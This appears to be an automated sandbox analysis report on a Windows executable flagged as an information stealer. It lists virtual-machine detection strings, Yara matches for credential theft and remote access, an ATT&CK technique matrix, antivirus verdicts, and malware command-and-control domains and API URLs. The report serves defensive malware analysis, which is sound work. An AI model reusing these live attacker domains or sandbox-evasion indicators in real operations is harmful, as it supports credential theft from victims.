                  Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252151809.000000000076A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                  Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043A9B0 LdrInitializeThunk,0_2_0043A9B0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00560083 push dword ptr fs:[00000030h]0_2_00560083
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0098092B mov eax, dword ptr fs:[00000030h]0_2_0098092B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00980D90 mov eax, dword ptr fs:[00000030h]0_2_00980D90

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: N1sb7Ii2YD.exeString found in binary or memory: debonairnukk.xyz
                  Source: N1sb7Ii2YD.exeString found in binary or memory: diffuculttan.xyz
                  Source: N1sb7Ii2YD.exeString found in binary or memory: effecterectz.xyz
                  Source: N1sb7Ii2YD.exeString found in binary or memory: deafeninggeh.biz
                  Source: N1sb7Ii2YD.exeString found in binary or memory: immureprech.biz
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.3.N1sb7Ii2YD.exe.2190000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.N1sb7Ii2YD.exe.2190000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N1sb7Ii2YD.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N1sb7Ii2YD.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.3.N1sb7Ii2YD.exe.2190000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.N1sb7Ii2YD.exe.2190000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N1sb7Ii2YD.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.N1sb7Ii2YD.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  PowerShell
                  1
                  DLL Side-Loading
                  1
                  Process Injection
                  1
                  Virtualization/Sandbox Evasion
                  OS Credential Dumping11
                  Security Software Discovery
                  Remote Services1
                  Screen Capture
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  1
                  Process Injection
                  LSASS Memory1
                  Virtualization/Sandbox Evasion
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Deobfuscate/Decode Files or Information
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin Shares2
                  Clipboard Data
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                  Obfuscated Files or Information
                  NTDS2
                  System Information Discovery
                  Distributed Component Object ModelInput Capture114
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Software Packing
                  LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  N1sb7Ii2YD.exe55%ReversingLabsWin32.Rootkit.BootkitX
                  N1sb7Ii2YD.exe100%AviraHEUR/AGEN.1306956
                  N1sb7Ii2YD.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://immureprech.biz/apisV100%Avira URL Cloudmalware
                  https://sordid-snaked.cyou/apizo100%Avira URL Cloudmalware
                  https://steamcommunity.cc0%Avira URL Cloudsafe
                  https://debonairnukk.xyz/apiho100%Avira URL Cloudmalware
                  https://awake-weaves.cyou/api1uoi100%Avira URL Cloudmalware
                  https://wrathful-jammy.cyou/apij100%Avira URL Cloudmalware
                  https://community.fastly.steams0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  104.121.10.34
                  truefalse
                    high
                    immureprech.biz
                    178.62.201.34
                    truefalse
                      high
                      deafeninggeh.biz
                      178.62.201.34
                      truefalse
                        high
                        sordid-snaked.cyou
                        unknown
                        unknownfalse
                          high
                          diffuculttan.xyz
                          unknown
                          unknownfalse
                            high
                            effecterectz.xyz
                            unknown
                            unknownfalse
                              high
                              awake-weaves.cyou
                              unknown
                              unknownfalse
                                high
                                wrathful-jammy.cyou
                                unknown
                                unknownfalse
                                  high
                                  debonairnukk.xyz
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    sordid-snaked.cyoufalse
                                      high
                                      deafeninggeh.bizfalse
                                        high
                                        effecterectz.xyzfalse
                                          high
                                          wrathful-jammy.cyoufalse
                                            high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              high
                                              awake-weaves.cyoufalse
                                                high
                                                immureprech.bizfalse
                                                  high
                                                  https://immureprech.biz/apifalse
                                                    high
                                                    debonairnukk.xyzfalse
                                                      high
                                                      diffuculttan.xyzfalse
                                                        high
                                                        https://deafeninggeh.biz/apifalse
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngN1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://player.vimeo.comN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://steamcommunity.com/?subsection=broadcastsN1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://store.steampowered.com/subscriber_agreement/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.gstatic.cn/recaptcha/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.valvesoftware.com/legal.htmN1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.youtube.comN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.comN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackN1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://debonairnukk.xyz/apihoN1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englN1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7TN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://s.ytimg.com;N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://steam.tv/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=eN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEBN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://store.steampowered.com/privacy_agreement/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://wrathful-jammy.cyou/N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://store.steampowered.com/points/shop/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://sketchfab.comN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://lv.queniujq.cnN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.youtube.com/N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://store.steampowered.com/privacy_agreement/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://immureprech.biz/apisVN1sb7Ii2YD.exe, 00000000.00000002.2313531864.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                unknown
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.google.com/recaptcha/N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://checkout.steampowered.com/N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://store.steampowered.com/;N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/about/N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/my/wishlist/N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamsN1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
